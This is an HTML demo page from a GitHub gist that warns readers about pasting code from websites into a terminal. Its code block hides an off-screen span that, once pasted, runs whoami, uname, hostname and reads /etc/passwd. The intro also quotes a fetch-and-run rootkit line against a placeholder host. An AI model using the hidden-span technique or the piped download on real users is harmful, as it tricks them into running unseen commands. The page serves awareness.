Last active
April 23, 2018 18:43
-
-
Save 0x9090/4d14a68afe6c8314f92e to your computer and use it in GitHub Desktop.
copy / paste hijack trick
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<title>sneaky copy-paste terminal example</title> | |
</head> | |
<style> | |
.codeblock { | |
background-color: lightyellow; | |
border: 1px dotted black; | |
margin-left: 50px; | |
display: inline-block; | |
} | |
</style> | |
<body> | |
<h3>intro</h3> | |
<p> | |
<font size=3> This shows an example of how it is dangerous to copy and paste lines of code from a website into your terminal, even if they are seemingly plaintext. I'm not talking about that shit where it's obviously bad to run something like <i>wget http://evilhax.or/rootkit.sh -O - | sh</i><br>Oh no, my friends. This is far worse. This is not anything new to the world, I had just happened to see it mentioned elsewhere earlier today and I found it interesting.</p> | |
<h3>hax</h3> | |
<p> | |
<ul> | |
<li>select the line of code in the box below with your mouse</li> | |
<li>copy it using ctrl+c (cmd+c on osx, whatever...)</li> | |
<li>paste it into your terminal</li> | |
<li>be..fucking...amazed...</li> | |
</ul> | |
</p> | |
<p class="codeblock"> | |
wget <span style="position: absolute; left: -100px; top: -100px">/dev/null; clear; echo -n "Hey there ";whoami|tr -d '\n';echo -e "\nheres some info from your box:\n";uname -a; hostname; head -n1 /etc/passwd<br></span>http://www.nullable.software/hi/copypasta.html | |
</p> | |
<h3>references</h3> | |
<ul> | |
<li> http://www.ush.it/team/ascii/hack-tricks_253C_CCC2008/wysinwyc/what_you_see_is_not_what_you_copy.txt</li> | |
<li> http://www.reddit.com/r/netsec/comments/1bv359/dont_copypaste_from_website_to_terminal_demo/</li> | |
</ul> | |
</font> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment